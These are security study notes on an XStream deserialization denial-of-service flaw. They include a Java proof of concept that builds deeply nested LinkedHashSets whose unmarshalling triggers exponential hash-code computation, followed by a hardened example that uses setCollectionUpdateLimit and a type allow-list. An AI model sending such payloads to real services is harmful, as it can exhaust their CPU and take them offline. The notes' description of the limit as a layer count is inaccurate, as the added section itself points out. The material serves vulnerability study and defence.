Vulnerability principle
- Advisory: https://www.tenable.com/plugins/nessus/157887
- POC:
- Code change:
Attack PoC
- Understanding the principle: the hash codes have to be recomputed in a loop on every insertion, so the performance cost grows exponentially with the nesting depth.
- s1,s2,t1,t2 …
- As soon as the XML is unmarshalled, the hash codes of the elements are calculated and the calculation time increases exponentially due to the highly recursive structure.

```java
import com.thoughtworks.xstream.XStream;

import java.util.LinkedHashSet;
import java.util.Set;

public class Xstream01Test {

    public static void testDoSAttackWithLinkedHashSet() {
        final Set<Object> set = new LinkedHashSet<>();
        Set<Object> s1 = set;
        Set<Object> s2 = new LinkedHashSet<>();
        // Build two chains of mutually nested sets; every level of one chain
        // contains the set of the same level in the other chain, so the hash
        // code of the root depends on an exponential number of sub-sets.
        for (int i = 0; i < 30; i++) {
            final Set<Object> t1 = new LinkedHashSet<>();
            final Set<Object> t2 = new LinkedHashSet<>();
            t1.add("a");
            t2.add("b");
            s1.add(t1);
            s1.add(t2);
            s2.add(t2);
            s2.add(t1);
            s1 = t1;
            s2 = t2;
        }
        XStream xstream = new XStream();
        final String xml = xstream.toXML(set); // generate the attack PoC
        System.out.println(xml);
        xstream.fromXML(xml); // sink point
    }

    public static void main(String[] args) throws Exception {
        long start = System.currentTimeMillis();
        testDoSAttackWithLinkedHashSet();
        long finish = System.currentTimeMillis();
        System.out.println(finish - start);
    }
}
```
Further thoughts
- Do other XML parsing libraries have the same kind of problem?
- Do JSON libraries such as Fastjson also have the same kind of recursive-nesting problem?
- How does the actual fix (see SecurityUtils) solve this problem?
- A function was added (xstream.setCollectionUpdateLimit(5), which lets you manually limit it to at most 5 layers)
- Understanding and analysis of other XStream deserialization gadgets
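The following is an added example, not code from the original notes or from the XStream project, showing the mitigation mentioned above in use: the same nested-set document is parsed through an XStream instance on which the update limit has been set, and the exception XStream raises when the limit is exceeded is caught and reported instead of the parser spinning for minutes. It assumes XStream 1.4.19 or later, where `setCollectionUpdateLimit` and `com.thoughtworks.xstream.security.InputManipulationException` exist; one caveat worth knowing is that XStream's own API names the parameter `maxSeconds`, so the value is a time budget for adding elements to collections and maps, not a nesting depth. The class and method names below are my own.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.InputManipulationException;

import java.util.LinkedHashSet;
import java.util.Set;

public class XstreamUpdateLimitExample {

    // Rebuild the nested LinkedHashSet structure from the PoC above
    // (constructed input for the demonstration; depth controls the blow-up).
    static Set<Object> buildNestedSets(int depth) {
        final Set<Object> root = new LinkedHashSet<>();
        Set<Object> s1 = root;
        Set<Object> s2 = new LinkedHashSet<>();
        for (int i = 0; i < depth; i++) {
            final Set<Object> t1 = new LinkedHashSet<>();
            final Set<Object> t2 = new LinkedHashSet<>();
            t1.add("a");
            t2.add("b");
            s1.add(t1);
            s1.add(t2);
            s2.add(t2);
            s2.add(t1);
            s1 = t1;
            s2 = t2;
        }
        return root;
    }

    // Hardened parser: only the collection types we expect are allowed, and
    // the cumulative time spent inserting into collections/maps is capped.
    static XStream hardenedXStream(int maxSeconds) {
        XStream xstream = new XStream();
        // Defense in depth: restrict the type allow-list to what this
        // document format actually needs (assumed format for this example).
        xstream.allowTypes(new Class[] { LinkedHashSet.class });
        // Cap the time XStream may spend adding elements to collections and maps
        // (argument is seconds, per XStream's API); the recursive hash-code
        // calculation triggered by the nested sets is counted against it.
        xstream.setCollectionUpdateLimit(maxSeconds);
        return xstream;
    }

    // Returns true when the document was parsed, false when XStream rejected it.
    static boolean parseOrReject(String xml, int maxSeconds) {
        try {
            hardenedXStream(maxSeconds).fromXML(xml);
            return true;
        } catch (InputManipulationException e) {
            System.out.println("rejected by update limit: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) {
        // Serialising the structure is cheap; only unmarshalling triggers the
        // exponential hash-code recomputation, so generate the document first.
        String xml = new XStream().toXML(buildNestedSets(30));

        long start = System.currentTimeMillis();
        boolean accepted = parseOrReject(xml, 5);
        long elapsed = System.currentTimeMillis() - start;

        System.out.println("accepted=" + accepted + " elapsed ms=" + elapsed);
    }
}
```

Run it once with the limit in place and once with `new XStream()` directly to compare: with the limit the parse is aborted after roughly the configured number of seconds and the caller receives a clear exception to log and alert on, which is the detection signal a service owner should wire into monitoring; without it the thread stays busy for as long as the recursion takes. Because the limit is a time budget, pick it from the parse times of legitimate documents on the deploying hardware rather than from an assumed nesting depth.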
